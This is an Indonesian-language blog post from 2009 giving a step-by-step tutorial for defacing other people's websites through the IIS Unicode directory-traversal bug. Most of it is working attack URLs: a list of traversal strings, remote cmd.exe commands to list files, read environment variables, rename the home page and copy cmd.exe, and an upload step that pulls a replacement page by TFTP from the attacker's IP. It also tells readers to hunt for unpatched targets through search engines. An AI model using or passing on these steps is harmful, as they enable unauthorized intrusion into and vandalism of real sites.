ILMU KOMPUTER | STRUKTUR KOMPUTER

TUTORIAL DEFACE WEBSITE

Diposkan oleh ILMU KOMPUTER Kamis, 20 Agustus 2009

TUTORIAL DEFACE WEBSITE

Pada posting ini kita coba membahas "deface website" apa itu ?? Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo kamu adalah web master dan sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kalian ketahui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan deface diantara kedua OS tsb. Operating System atau OS biasanya kalo kita kelompikin ke 2 keluarga besar,yaitu :
  1. IIS (server untuk microsoft, dkk)
  2. Unix(linux,BSD,IRIX,SOLARIS,dsb)
Melalui tutorial ini saya teh hanya ingin berbagi ilmu mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...keyword nya terserah
Lalu utk mengetahui site itu menggunakan MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??
Setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...
Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....
coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg
bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering kita gunakan ehehhehehhee...



Contoh:
http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
  1. Muncul pesan ERROR ...
  2. Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL
diatas menjadi empat bagian yaitu :
  • Bagian host, yaitu "http://www.targethost.com"
  • Bagian exploit string, yaitu "/scripts/..%255c..%255c"
  • Bagian folder, yaitu "/winnt/system32/"
  • Bagian command, yaitu "cmd.exe?/c+dir+c:\"

 
Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering tembus adalah :

- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

kalo sudah dapet site yg bug unicodenyah gak di patch. Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti.
default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,. ada juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini



http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah :
C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Isinyah banyak banged. Mana dokumen2 web yg kita curigain itu ada 3 bijih. lagehh... .hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah..... truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html

Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah... contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
Access is denied

Jangan nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee (Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk langkah selanjutnyah*)

Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.

*Cara pertama :*
Untuk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut :



http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Pasti hasilnya akan seperti di bawah ini :

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :
1 file(s) copied.

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :

dapat dilihat disini
Kita liat apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi

Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :
  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian command yaitu, cmdku.exe?/c+echo+
  • Bagian HTML
  • Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu, C:\InetPub\wwwroot\main.html

Cara Kedua Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus mendownload software TFTP32 terlebih dahulu di http://www.download.com ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya :

http://www.targethost.com/scripts/..%255c..%255c
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe
up-load)+ C:\InetPub\wwwroot\main.html

Kita liat lagi apa yg terjadi di IE kita.

CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are :

Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.

Sayah akan uraikan juga URL tadee menjadi 4 bagian :

  • Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c
  • Bagian folder, yaitu /winnt/system32/
  • Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+
  • Bagian PATH_TRANSLATEDNYAH(rootnya)+Dokumen webnya yaitu,
  • C:\InetPub\wwwroot\main.html

Kekurangannyah dalam meng-upload file lewat TFTP32 terkadang suatu server (web site) tidak mau menerima up-load file kita tadee.Jikalau itu terjadi maka gunakanlah cara pertama diatas tadee.

Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat tutorial ini. Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap tutorial ini.

3 komentar

  1. aRi isTiadi Says:
  2. tipsnya bagus nih kang

    ajarin bikin web dong kang pake dreamweaver

     
  3. Reply Says:
  4. Nanti deh saya buat postingannya tentang tutorial dreamweaver..
    Trims

     
  5. melcior Says:
  6. request dong...
    buat web pake dreamweaver bang....

     

Poskan Komentar